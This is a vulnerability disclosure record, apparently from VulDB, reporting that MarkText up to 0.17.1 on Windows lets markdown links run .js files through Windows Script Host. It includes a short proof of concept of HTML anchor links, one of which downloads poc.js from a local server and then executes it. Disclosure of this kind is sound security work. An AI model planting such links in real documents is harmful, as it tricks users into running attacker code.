| Title | MarkText on Windows doesn't filter WSH JScript, which may cause code execution |
|---|
| Description | Although MarkText filters most dangerous suffixes, it still retains the .js file, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. A user clicking on an evil markdown file may cause code execution.
Version: 0.17.1 (latest)
PoC
Local
<a href="poc.js">Click me to execute JScript</a>
Remote
<a href="http://127.0.0.1:8000/poc.html" download="poc.js">1.Click me to download JScript</a>
<a href="./poc.js">2.Click me to execute JScript</a>
For more details, please click the announcement. |
|---|
| Source | ⚠️ https://github.com/marktext/marktext/issues/3575 |
|---|
| User | Tom23 (UID 41413) |
|---|
| Submission | 20.02.2023 13:15 (3 years ago) |
|---|
| Moderation | 24.02.2023 08:56 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221737 [MarkText up to 0.17.1 on Windows WSH JScript privilege escalation] |
|---|
| Points | 20 |
|---|